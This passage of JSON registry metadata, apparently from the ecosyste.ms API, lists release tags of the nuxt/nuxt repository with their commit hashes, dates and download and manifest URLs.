e.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"